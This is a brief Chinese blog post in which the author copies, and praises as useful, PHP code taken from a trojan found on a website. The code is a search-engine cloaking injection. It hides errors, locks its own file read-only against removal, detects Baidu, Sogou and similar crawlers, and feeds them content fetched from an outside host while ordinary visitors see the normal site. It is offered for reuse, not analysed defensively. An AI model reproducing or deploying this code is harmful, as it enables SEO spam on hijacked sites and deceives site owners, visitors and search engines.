一个远程调用另外站点数据函数

 今天查看木马中发现一个黑客的远程调用数据函数蛮有用的，今天记录下：

set_time_limit(0);
error_reporting(0);
$tr = "stristr";
$er = $_SERVER;
function httpGet($url) {
  $ch = curl_init();
  //设置选项，包括URL
  curl_setopt($ch, CURLOPT_URL, $url);
  curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)');
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($ch, CURLOPT_HEADER, 0);
  //执行并获取HTML文档内容
  $output = curl_exec($ch);
  //释放curl句柄
  curl_close($ch);
  //打印获得的数据
  return $output;
}
$filename1 = @end(explode('/', $url1));
function set_writeable($file_name)
{
   @chmod($file_name, 0444);
}
@chmod(__FILE__, 0444);
set_writeable($filename1);
define('url',$er['REQUEST_URI']);
define('ref',$er['HTTP_REFERER']);
define('ent',$er['HTTP_USER_AGENT']);
define('site',"http://www.domain.com/");
define('road',"/?" .$er['HTTP_HOST'] . url);
define('regs','@Baidu|Sogou|Yisou|Soso|Haosou|Spider|So.com|Sm.cn@i');
define('area',$tr(url,".xml") or $tr(url,".doc") or $tr(url,".pdf") or $tr(url,".txt") or $tr(url,".ppt") or $tr(url,".pptx") or $tr(url,".xls") or $tr(url,".csv") or $tr(url,".shtml") or $tr(url,".tacc")or $tr(url,".ga")or $tr(url,".asp")or $tr(url,".aspx")or $tr(url,".gq")or $tr(url,".html") or $tr(url,".xlsx")or $tr(url,".znb")or $tr(url,".rar") or $tr(url,".zip")or $tr(url,".cnm")or $tr(url,".bak") or $tr(url,".jsp")or $tr(url,".jspx")and $tr(url,"?"));
if (area && preg_match(regs, ref)) {
    echo file_get_contents("http://www.domain.com/");
    exit;
}
if (preg_match(regs, ent)) {
    if (area) {
        echo httpGet(site.road);
        exit;
    } else {
        echo httpGet("http://www.domain.com/xxx.php");
        ob_flush();
        flush();
    }
}